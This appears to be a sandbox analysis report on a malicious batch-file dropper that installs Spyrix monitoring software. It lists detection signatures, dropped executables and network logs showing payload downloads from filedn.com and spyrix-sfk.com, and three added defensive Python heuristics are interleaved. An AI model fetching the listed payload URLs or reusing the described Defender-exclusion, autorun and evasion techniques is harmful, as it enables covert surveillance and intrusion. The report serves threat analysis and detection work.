Windows Analysis Report
D0WmCTD2qO.bat

Overview

General Information

Sample name: D0WmCTD2qO.bat
renamed because original name is a hash value
Original sample name: 500329d1eeead6e6b7b1570f637138e91f0e28a4febeae208631db98750312ee.bat
Analysis ID: 1523869
MD5: 6777134e2627894ed689d8357973acc7
SHA1: cd0fab81cecb98eb8b5c5530cf291e9c6e854453
SHA256: 500329d1eeead6e6b7b1570f637138e91f0e28a4febeae208631db98750312ee
Tags: bat, filedn-com, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Found API chain indicative of debugger detection
Found stalling execution ending in API Sleep call
Loading BitLocker PowerShell Module
PE file has nameless sections
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses cmd line tools excessively to alter registry or file data
Uses netstat to query active network connections and open ports
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
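Several of the signatures above are pure PE header heuristics: "Binary contains a suspicious time stamp", "PE file has nameless sections", "PE file contains sections with non-standard names" and "PE file contains more sections than normal". The following Python is an added example, not part of the sandbox report or of the analysed sample, showing how those checks are derived from the COFF file header and section table alone. The standard-name list, the 8-section threshold and the one-day future-timestamp tolerance are assumptions of this example; the PE image it audits is a header-only stub constructed in the code for testing and is not loadable.

```python
import struct
import time
from typing import List, Optional, Tuple

# Section names a mainstream linker emits; anything else counts as non-standard
# (assumed list for this example).
STANDARD_SECTION_NAMES = {
    b".text", b".data", b".rdata", b".bss", b".idata", b".edata", b".pdata",
    b".rsrc", b".reloc", b".tls", b".CRT", b".xdata",
}
TYPICAL_MAX_SECTIONS = 8          # threshold chosen for this example


def parse_pe_sections(pe: bytes) -> Tuple[int, List[bytes]]:
    """Return (TimeDateStamp, [section names]) read from a PE image's headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    (_machine, n_sections, timestamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size    # section table follows the optional header
    names = []
    for i in range(n_sections):
        off = table + 40 * i        # each IMAGE_SECTION_HEADER is 40 bytes
        names.append(pe[off:off + 8].rstrip(b"\0"))
    return timestamp, names


def audit_pe(pe: bytes, now: Optional[int] = None) -> List[str]:
    """Reproduce the header heuristics named in the signature list."""
    now = int(time.time()) if now is None else now
    timestamp, names = parse_pe_sections(pe)
    findings = []
    if timestamp == 0 or timestamp > now + 86400:   # zeroed or in the future
        findings.append("suspicious time stamp")
    if any(n == b"" for n in names):
        findings.append("nameless section")
    odd = [n.decode("latin-1") for n in names if n and n not in STANDARD_SECTION_NAMES]
    if odd:
        findings.append("non-standard section names: " + ", ".join(odd))
    if len(names) > TYPICAL_MAX_SECTIONS:
        findings.append(f"more sections than normal ({len(names)})")
    return findings


def build_test_pe(timestamp: int, section_names: List[bytes]) -> bytes:
    """Construct a header-only PE32 image for testing (no code, not loadable)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0                                  # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), timestamp,
                       0, 0, opt_size, 0x0102)
    sections = b"".join(
        name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", 0x1000, 0x1000 * (i + 1),
                                           0x200, 0x400 * (i + 1), 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names)
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + sections


if __name__ == "__main__":
    sample = build_test_pe(0x7FFFFFFF, [b".text", b"", b".xyz", b".rsrc"])
    for finding in audit_pe(sample):
        print(finding)
```

The same parser works on a real dropped file by reading it with `open(path, "rb").read()`; a packer typically trips the nameless/non-standard-name checks, while a zeroed or future TimeDateStamp usually indicates deliberate tampering rather than a clock error.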

Classification

AV Detection

Source: D0WmCTD2qO.bat ReversingLabs: Detection: 26%
Source: D0WmCTD2qO.bat Virustotal: Detection: 20%
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0038C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 71_2_0038C770
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00389BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 71_2_00389BC0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00389D10 memcpy,memmove,memset,CertFreeCertificateContext,WSAGetLastError,strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertFreeCertificateContext,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,CertFreeCertificateContext, 71_2_00389D10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: -----BEGIN PUBLIC KEY----- 71_2_00388FA0
Source: qrl.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: https://dashboard.spyrix.com/login HTTP Parser: Number of links: 0
Source: https://dashboard.spyrix.com/login HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://dashboard.spyrix.com/login HTTP Parser: Title: Welcome Back does not match URL
Source: https://dashboard.spyrix.com/login HTTP Parser: <input type="password" .../> found
Source: https://dashboard.spyrix.com/login HTTP Parser: No <meta name="author".. found
Source: https://dashboard.spyrix.com/login HTTP Parser: No <meta name="copyright".. found
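The "HTTP Parser" entries above are the sandbox's phishing heuristics applied to the fetched login page: few or no real links, a password field with no form action to submit to, a title that does not mention the host, and missing author/copyright metadata. The Python below is an added example (not sandbox code, and not the real page) that implements those five checks with the standard-library HTML parser. The sample pages, host name and the 3-link threshold are constructed for the example; a JavaScript-rendered single-page login legitimately trips these checks too, so treat hits as a prompt for review rather than a verdict.

```python
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse


class LoginPageInspector(HTMLParser):
    """Collect the page features the heuristics look at."""

    def __init__(self) -> None:
        super().__init__()
        self.title_parts: List[str] = []
        self._in_title = False
        self.good_links = 0          # <a href> that actually leads somewhere
        self.password_inputs = 0
        self.form_actions: List[str] = []
        self.meta_names = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = (a.get("href") or "").strip()
            if href and not href.startswith(("#", "javascript:")):
                self.good_links += 1
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append((a.get("action") or "").strip())
        elif tag == "meta" and a.get("name"):
            self.meta_names.add(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title_parts.append(data)


def inspect_login_page(url: str, html: str, min_good_links: int = 3) -> List[str]:
    """Return the heuristic findings for one fetched page."""
    p = LoginPageInspector()
    p.feed(html)
    p.close()
    title = " ".join(p.title_parts).strip()
    host = (urlparse(url).hostname or "").lower()
    findings = []
    if p.good_links < min_good_links:
        findings.append(f"low number of good links ({p.good_links})")
    if p.password_inputs and not any(p.form_actions):
        findings.append("password input but no form action")
    # Title/URL agreement: some 4+ letter word of the title appears in the host name.
    words = [w.lower() for w in re.findall(r"[A-Za-z]{4,}", title)]
    if title and not any(w in host for w in words):
        findings.append(f"title {title!r} does not match URL host {host!r}")
    for name in ("author", "copyright"):
        if name not in p.meta_names:
            findings.append(f"no <meta name={name!r}>")
    return findings


# Constructed login page in the style of a JavaScript-rendered dashboard; the
# host name is fictitious and the markup is not taken from any real site.
SAMPLE_URL = "https://dashboard.example.invalid/login"
SAMPLE_HTML = """<!doctype html>
<html><head><title>Welcome Back</title></head>
<body><div id="app">
  <input type="email" placeholder="Email">
  <input type="password" placeholder="Password">
  <button type="button">Log in</button>
</div><script src="/app.js"></script></body></html>"""

# Constructed control page that should produce no findings.
CONTROL_HTML = """<html><head><title>Example Dashboard Login</title>
<meta name="author" content="Example Inc"><meta name="copyright" content="Example Inc">
</head><body>
<a href="/">Home</a> <a href="/pricing">Pricing</a> <a href="/help">Help</a>
<form method="post" action="/login"><input type="password" name="pw"></form>
</body></html>"""

if __name__ == "__main__":
    for finding in inspect_login_page(SAMPLE_URL, SAMPLE_HTML):
        print(finding)
```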
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49720 version: TLS 1.0
Source: unknown HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0040AC68 FindFirstFileW,FindClose, 56_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW, 56_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033775E8 FindFirstFileA, 56_2_033775E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033776C4 FindFirstFileA,GetLastError, 56_2_033776C4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov eax, edx 71_2_0037B510
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then cmp dword ptr [edi+04h], ebp 71_2_003748F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then movzx edx, byte ptr [ecx] 71_2_003D5060
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push esi 71_2_003720F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then add eax, dword ptr [ecx+10h] 71_2_003DC0F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov ecx, eax 71_2_003CF270
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00376370
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov edi, dword ptr [ebx] 71_2_00377360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov byte ptr [edx], cl 71_2_003B5360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push dword ptr [ebx] 71_2_003833B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_003774E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377641
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 0000000Ch 71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000019h 71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_003776C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377771
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_0037774F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_003777DB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377828
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_0037785D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_003778AB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov ebx, dword ptr [edi-04h] 71_2_003CE8A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377924
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377959
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_003779B7
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 71_2_003959E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov eax, dword ptr [edi] 71_2_00365A00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377A5E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377A9B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then test ebp, ebp 71_2_00388AE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov ebx, ebp 71_2_0038DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 71_2_0038DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377BAC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377B8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then test ebp, ebp 71_2_00388BD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then cmp esi, edi 71_2_003B6C00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov ebx, dword ptr [esi] 71_2_003A3C90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov edx, dword ptr [esp+74h] 71_2_0038BD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push 00000000h 71_2_00377D8F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then mov ebp, dword ptr [ebx+58h] 71_2_003CADE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 4x nop then push dword ptr [edi] 71_2_003B8EF0

Networking

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: global traffic HTTP traffic detected:
    GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6 HTTP/1.1
    Host: filedn.com
    Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49720 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
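The "TCP traffic detected without corresponding DNS query" entries above are produced by correlating the capture's DNS answers with the destinations of outbound connections: a connection to an address that no A/AAAA answer ever returned points at a hard-coded IP (or at a resolver the sandbox could not see). The Python below is an added example, not sandbox code, that performs that correlation over a small constructed event log. It goes slightly beyond the report's check by processing events in order, so a connection that precedes the lookup of its own address is also flagged. The log format, host names and addresses (RFC 5737 documentation ranges) are invented for the example, and the set of "local" networks to ignore is an assumption.

```python
import ipaddress
from collections import Counter
from typing import Dict, Iterable, Optional, Tuple

# Address ranges that never need a DNS lookup in this analysis (sandbox LAN,
# loopback, link-local); everything else is treated as remote. Assumed list.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
               "127.0.0.0/8", "169.254.0.0/16")]


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Parse one line of the constructed event log used below.

    dns <client> -> <resolver> A <name> <answer_ip>
    tcp <src>:<sport> -> <dst>:<dport>
    Anything after a '#' or that does not match is ignored.
    """
    parts = line.split()
    if not parts or parts[0].startswith("#"):
        return None
    if parts[0] == "dns" and len(parts) >= 7:
        return ("dns", parts[5], parts[6])          # (kind, name, answer ip)
    if parts[0] == "tcp" and len(parts) >= 4:
        dst_ip, dst_port = parts[3].rsplit(":", 1)
        return ("tcp", dst_ip, dst_port)            # (kind, dst ip, dst port)
    return None


def connections_without_dns(lines: Iterable[str]) -> Dict[str, int]:
    """Count TCP connections to remote IPs that no earlier DNS answer produced."""
    resolved: Dict[str, set] = {}     # answer ip -> names that resolved to it
    hits: Counter = Counter()
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        kind, a, b = ev
        if kind == "dns":
            resolved.setdefault(b, set()).add(a)
            continue
        ip = ipaddress.ip_address(a)
        if ip.is_multicast or any(ip in net for net in LOCAL_NETS):
            continue
        if a not in resolved:
            hits[a] += 1
    return dict(hits)


# Constructed event log (not from the report's capture).
SAMPLE_EVENTS = """\
dns 192.168.2.8 -> 1.1.1.1 A cdn.example.test 203.0.113.10
tcp 192.168.2.8:49701 -> 203.0.113.10:443      # resolved above: fine
tcp 192.168.2.8:49702 -> 198.51.100.7:443      # hard-coded: never resolved
tcp 192.168.2.8:49703 -> 198.51.100.7:443
tcp 192.168.2.8:49704 -> 192.0.2.44:80         # connects before the lookup
dns 192.168.2.8 -> 1.1.1.1 A late.example.test 192.0.2.44
tcp 192.168.2.8:49705 -> 192.0.2.44:80         # now resolved: fine
tcp 192.168.2.8:49706 -> 192.168.2.1:445       # sandbox LAN: ignored
""".splitlines()

if __name__ == "__main__":
    for ip, count in connections_without_dns(SAMPLE_EVENTS).items():
        print(f"{ip}: {count} connection(s) without a preceding DNS answer")
```

On a real capture the same logic is fed from DNS response records and TCP SYNs; Windows telemetry and CDN endpoints reached via cached or DoH resolution also show up here, which is why the report lists them as plain "unknown" traffic rather than as a detection on its own.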
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003973D0 recv,send,WSAGetLastError, 71_2_003973D0
Source: global traffic HTTP traffic detected:
    GET /lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404 HTTP/1.1
    Host: filedn.com
    User-Agent: curl/7.83.1
    Accept: */*
Source: global traffic HTTP traffic detected:
    GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6 HTTP/1.1
    Host: filedn.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XYT5nbVGers4f7G&MD=VVPG9a78 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected:
    GET /loader/link.php?prg_id=sfk HTTP/1.1
    Host: cdnbaynet.com
    User-Agent: sfk-dst-loader-2.0
    Accept: */*
Source: global traffic HTTP traffic detected:
    GET /download/sfk/sfk_setup.exe HTTP/1.1
    Host: swtb-download.spyrix-sfk.com
    User-Agent: sfk-dst-loader-2.0
    Accept: */*
Source: global traffic HTTP traffic detected:
    GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XYT5nbVGers4f7G&MD=VVPG9a78 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
